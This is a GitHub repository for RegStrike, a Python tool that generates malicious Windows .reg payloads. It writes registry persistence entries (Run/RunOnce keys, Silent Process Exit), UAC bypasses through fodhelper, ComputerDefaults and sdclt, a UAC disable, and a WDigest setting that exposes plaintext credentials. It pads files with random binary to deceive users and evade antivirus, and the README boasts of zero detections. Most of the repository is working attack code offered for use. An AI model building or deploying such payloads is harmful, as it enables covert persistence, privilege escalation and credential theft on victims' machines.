├── LICENSE ├── README.md ├── RegStrike └── RegStrike.py └── assets ├── not_obf.PNG ├── not_obf_vt.PNG ├── obf.PNG ├── obf_vt.PNG └── ui.PNG /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Itay Migdal 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | # Regstrike 3 | 4 | *RegStrike is a .reg payload generator.* 5 | 6 | ![](/assets/ui.PNG) 7 | 8 | It's simple, intuitive, lightweight, and dependency free. 9 | 10 | The main purpose of the .reg payloads is to add persistence using various techniques (including combination with UAC bypass techniques). 11 | It also capable of messing with some other registry settings. 12 | 13 | Although .reg files are basically textual files, turns out that adding binary data to it won't break it, and the .reg file will still be parsed correctly. This fact lets you obfuscate the .reg file with tons of jibberish data and fool users to believe that this file is unreadable binary. Therefore supply RegStrike with the amount of obfuscation to add and it's got you covered. 14 | 15 | One of the main reasons one would want to use .reg as a payload is because of the very low detection rate by AV products, and apparently obfuscation even lowering it more. 16 | 17 | For Example here is a .reg payload example that uses the [Silent Process Exit](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/) technique for persistence: 18 | 19 | ![](/assets/not_obf.PNG) 20 | 21 | And its very low detection on VT: 22 | 23 | ![](/assets/not_obf_vt.PNG) 24 | 25 | Adding 3 MB of binary obfuscation: 26 | 27 | ![](/assets/obf.PNG) 28 | 29 | Will make it zero :smiling_imp: 30 | 31 | ![](/assets/obf_vt.PNG) 32 | 33 | RegStrike is easily extendable for more persistence methods / registry values that attacker would want to add. 34 | Feel free to open PRs and issues and contact me at ([Gmail](itaymigdal9@gmail.com) | [Linkedin](https://www.linkedin.com/in/itay-migdal-b91821116/) | [Twitter](https://twitter.com/0xTheBruter)). 35 | -------------------------------------------------------------------------------- /RegStrike/RegStrike.py: -------------------------------------------------------------------------------- 1 | from os import urandom 2 | 3 | regstrike_banner = """ 4 | ___ ___ _ _ _ 5 | | _ \___ __ _/ __| |_ _ _(_) |_____ 6 | | / -_) _` \__ \ _| '_| | / / -_) 7 | |_|_\___\__, |___/\__|_| |_|_\_\___| 8 | |___/ 9 | 10 | >> Create offensive .reg payloads easy peasy :) 11 | https://github.com/itaymigdal/RegStrike 12 | By Itay Migdal 13 | """ 14 | reg_filename = "hi.reg" 15 | payload_prefix = "Windows Registry Editor Version 5.00\n" 16 | payload = payload_prefix 17 | template_run = r""" 18 | [{}\Software\Microsoft\Windows\CurrentVersion\{}] 19 | "{}"="{}" 20 | """ 21 | template_spe = r""" 22 | [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\{0}] 23 | "GlobalFlag"=dword:00000200 24 | 25 | [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\{0}] 26 | "ReportingMode"=dword:00000001 27 | "MonitorProcess"="{1}" 28 | """ 29 | template_bypass_uac = r""" 30 | [HKEY_CURRENT_USER\software\classes\{}\shell\open\command] 31 | "DelegateExecute"="" 32 | ""="{}" 33 | """ 34 | template_disable_uac = r""" 35 | [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] 36 | "EnableLUA"=dword:00000000 37 | """ 38 | template_wdigest = r""" 39 | [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest] 40 | "UseLogonCredential"=dword:00000001 41 | """ 42 | 43 | 44 | def sanitize_command(command): 45 | bad_chars = { 46 | '"': r'\"' 47 | } 48 | for c in bad_chars: 49 | command = command.replace(c, bad_chars[c]) 50 | return command 51 | 52 | 53 | def add_run(): 54 | global payload 55 | while True: 56 | print("[>] Choose hive and key:") 57 | print("[1] HKCU, Run") 58 | print("[2] HKCU, RunOnce") 59 | print("[3] HKLM, Run (requires admin)") 60 | print("[4] HKLM, RunOnce (requires admin)") 61 | print("[99] Back") 62 | i = int(input(">> ")) 63 | if i == 1: 64 | run_hive = "HKEY_CURRENT_USER" 65 | run_key = "Run" 66 | elif i == 2: 67 | run_hive = "HKEY_CURRENT_USER" 68 | run_key = "RunOnce" 69 | elif i == 3: 70 | run_hive = "HKEY_LOCAL_MACHINE" 71 | run_key = "Run" 72 | elif i == 4: 73 | run_hive = "HKEY_LOCAL_MACHINE" 74 | run_key = "RunOnce" 75 | elif i == 99: 76 | return 77 | else: 78 | print("[-] No such option :(") 79 | continue 80 | print("[>] Enter key data name (e.g. GoogleUpdate):") 81 | data_name = input(">> ") 82 | print(r"[>] Enter the command to execute (e.g. 'pOwErShElL -enc aQBlAHgAIA...')") 83 | command = sanitize_command(input(">> ")) 84 | 85 | payload += template_run.format(run_hive, run_key, data_name, command) 86 | print("[+] Added") 87 | return 88 | 89 | 90 | def add_uac_run(): 91 | global payload 92 | while True: 93 | print("[>] Choose key:") 94 | print("[1] Run") 95 | print("[2] RunOnce") 96 | print("[99] Back") 97 | i = int(input(">> ")) 98 | if i == 1: 99 | run_key = "Run" 100 | elif i == 2: 101 | run_key = "RunOnce" 102 | elif i == 99: 103 | return 104 | else: 105 | print("[-] No such option :(") 106 | continue 107 | print("[>] Choose UAC Bypass method:") 108 | print("[1] Fodhelper") 109 | print("[2] ComputerDefaults") 110 | print("[3] Sdclt") 111 | print("[99] Back") 112 | i = int(input(">> ")) 113 | if i == 1: 114 | reg_class = "ms-settings" 115 | uac_binary = "fodhelper.exe" 116 | elif i == 2: 117 | reg_class = "ms-settings" 118 | uac_binary = "computerdefaults.exe" 119 | elif i == 3: 120 | reg_class = "folder" 121 | uac_binary = "sdclt.exe" 122 | elif i == 99: 123 | return 124 | else: 125 | print("[-] No such option :(") 126 | continue 127 | print("[>] Enter key data name (e.g. GoogleUpdate):") 128 | data_name = input(">> ") 129 | print(r"[>] Enter the command to execute (e.g. 'pOwErShElL -enc aQBlAHgAIA...')") 130 | command = sanitize_command(input(">> ")) 131 | payload += template_bypass_uac.format(reg_class, command) 132 | payload += template_run.format("HKEY_CURRENT_USER", run_key, data_name, uac_binary) 133 | print("[+] Added") 134 | return 135 | 136 | 137 | def add_spe(): 138 | global payload 139 | print("[>] Enter the process name that when exits will trigger the command (e.g. notepad.exe)") 140 | process_name = input(">> ") 141 | print(r"[>] Enter the command to execute (e.g. 'pOwErShElL -enc aQBlAHgAIA...')") 142 | command = sanitize_command(input(">> ")) 143 | payload += template_spe.format(process_name, command) 144 | print("[+] Added") 145 | 146 | 147 | def add_persistence(): 148 | print("[>] Choose:") 149 | print("[1] Add persistence using a Run/RunOnce key") 150 | print("[2] Add persistence using a Run/RunOnce key and UAC bypass") 151 | print("[3] Add persistence using Silent Process Exit technique (requires admin)") 152 | print("[99] Back") 153 | i = int(input(">> ")) 154 | if i == 1: 155 | add_run() 156 | elif i == 2: 157 | add_uac_run() 158 | elif i == 3: 159 | add_spe() 160 | elif i == 99: 161 | return 162 | else: 163 | print("[-] No such option :(") 164 | 165 | 166 | def mess_with_registry(): 167 | global payload 168 | while True: 169 | print("[>] Choose:") 170 | print("[1] Disable UAC (requires admin)") 171 | print("[2] Enable plaintext credentials in memory via wdigest (requires admin)") 172 | print("[99] Back") 173 | i = int(input(">> ")) 174 | if i == 1: 175 | payload += template_disable_uac 176 | if i == 2: 177 | payload += template_wdigest 178 | elif i == 99: 179 | return 180 | else: 181 | print("[-] No such option :(") 182 | continue 183 | print("[+] Added") 184 | return 185 | 186 | 187 | def add_obfuscation(obf_length): 188 | global payload 189 | obfuscated_payload = b"" 190 | splited_payload = payload.split("\n") 191 | obf_len_per_line = int(obf_length / splited_payload.count("")) 192 | 193 | for splited in splited_payload: 194 | if splited == "": 195 | obfuscated_payload += (b"\n" + urandom(obf_len_per_line) + b"\n") 196 | else: 197 | if splited.startswith('"'): 198 | splited = "\n" + splited 199 | obfuscated_payload += splited.encode() 200 | return obfuscated_payload 201 | 202 | 203 | def print_payload(): 204 | print(payload) 205 | 206 | 207 | def reset_payload(): 208 | global payload 209 | payload = payload_prefix 210 | print("[+] Payload reset") 211 | 212 | 213 | def save_payload(): 214 | global reg_filename 215 | print(f"[>] How many KB of obfuscation to add (0 for none)") 216 | obf_length = int(input(">> ")) * 1024 217 | obf_payload = add_obfuscation(obf_length) 218 | print(f"[>] Enter output file: (ENTER for default: {reg_filename})") 219 | alt_filename = input(">> ") 220 | if alt_filename != "": 221 | reg_filename = alt_filename 222 | with open(reg_filename, "wb") as f: 223 | f.write(obf_payload) 224 | print(f"[+] Payload saved as {reg_filename}") 225 | 226 | 227 | def main_screen(): 228 | while True: 229 | print("[>] Choose:") 230 | print("[1] Add persistence") 231 | print("[2] Mess with registry settings") 232 | print("[3] Print payload") 233 | print("[4] Reset payload") 234 | print("[5] Save payload") 235 | print("[99] Exit") 236 | i = int(input(">> ")) 237 | if i == 1: 238 | add_persistence() 239 | elif i == 2: 240 | mess_with_registry() 241 | elif i == 3: 242 | print_payload() 243 | elif i == 4: 244 | reset_payload() 245 | elif i == 5: 246 | save_payload() 247 | elif i == 99: 248 | return 249 | else: 250 | print("[-] No such option :(") 251 | 252 | 253 | if __name__ == '__main__': 254 | print(regstrike_banner) 255 | main_screen() 256 | -------------------------------------------------------------------------------- /assets/not_obf.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/itaymigdal/RegStrike/77a779aa340863a64e33deaae765d8ded7ba98da/assets/not_obf.PNG -------------------------------------------------------------------------------- /assets/not_obf_vt.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/itaymigdal/RegStrike/77a779aa340863a64e33deaae765d8ded7ba98da/assets/not_obf_vt.PNG -------------------------------------------------------------------------------- /assets/obf.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/itaymigdal/RegStrike/77a779aa340863a64e33deaae765d8ded7ba98da/assets/obf.PNG -------------------------------------------------------------------------------- /assets/obf_vt.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/itaymigdal/RegStrike/77a779aa340863a64e33deaae765d8ded7ba98da/assets/obf_vt.PNG -------------------------------------------------------------------------------- /assets/ui.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/itaymigdal/RegStrike/77a779aa340863a64e33deaae765d8ded7ba98da/assets/ui.PNG --------------------------------------------------------------------------------